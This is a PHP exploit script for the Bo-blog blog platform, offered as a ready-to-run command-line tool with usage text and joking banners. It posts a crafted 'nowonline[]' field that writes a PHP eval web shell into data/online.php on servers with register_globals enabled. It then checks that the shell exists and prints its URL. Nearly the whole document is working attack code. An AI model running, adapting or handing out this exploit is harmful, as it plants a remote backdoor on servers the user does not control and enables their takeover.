Exploit For Last Bo-blog version

<? ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); $data ='nowonline[]=<?php @eval($_REQUEST[orz]);echo orz;die();?>&1468108794=orz&-1844564458=orz'; $server =$argv[1]; $sitepath =$argv[2]; if($argc!=3){ hr(); echo" Uaget: boblog.php www.defence80.com /blog/\r\n"; echo" We Are ScriptKiz....\r\n"; hr(); ver(); exit; } echo "\r\nExploit For Bo-blog Last Version \r\n"; echo "Need Register Globals = On\r\n"; echo "\r\n"; preg_match('/X-Powered-By: php\/(.+)\r\n/ie',send("",'index.php'),$php); echo "We Got php version:\t".$php[1]."\r\n"; function send($cmd,$script) { global $sitepath,$server,$cookie,$count; $path =$sitepath.$script; $count=$count+1; $message = "POST ".$path." HTTP/1.1\r\n"; $message .= "Accept: */*\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Referer: http://".$server.$path."\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "Host: ".$server."\r\n"; $message .= "User-Agent: ".$useragent."\r\n"; $message .= "Content-length: ".strlen($cmd)."\r\n"; $message .= "Connection: Keep-Alive\r\n"; $message .= "Cookie: ".$cookie."\r\n"; $message .= "\r\n"; $message .= $cmd."\r\n"; //echo $message; $fd = @fsockopen( $server, 80 ); @fputs($fd,$message); $resp = "<-_->"; if($fd) { while(!@feof($fd)) { $resp .= @fread($fd,1024); } } @fclose($fd); $resp .="</-_->"; //echo $resp; return $resp; } echo "Exploiting:\t\t............\r\n"; $response=send($data,'index.php'); $data=''; $response=send($data,'data/online.php'); if(strstr($response,'orz')) { echo "We Got Webshell:\thttp://$server$path/data/online.php\r\n"; echo "For Fun :)"; } else die("Exploit Failed!\r\n"); function ver(){ //版本信息,排列格式花了不少时间啊, - -||| echo" +-------------------+ +-------------------+\r\n"; echo" +-www.loveshell.net-+ o'(-_-)'o +-- danger??? --+\r\n"; echo" +-------------------+ 啊？你说不怕火星人啊？ +-------------------+\r\n"; hr(); } function hr(){ echo" +-------------------------------------------------------------------+\r\n"; } ?>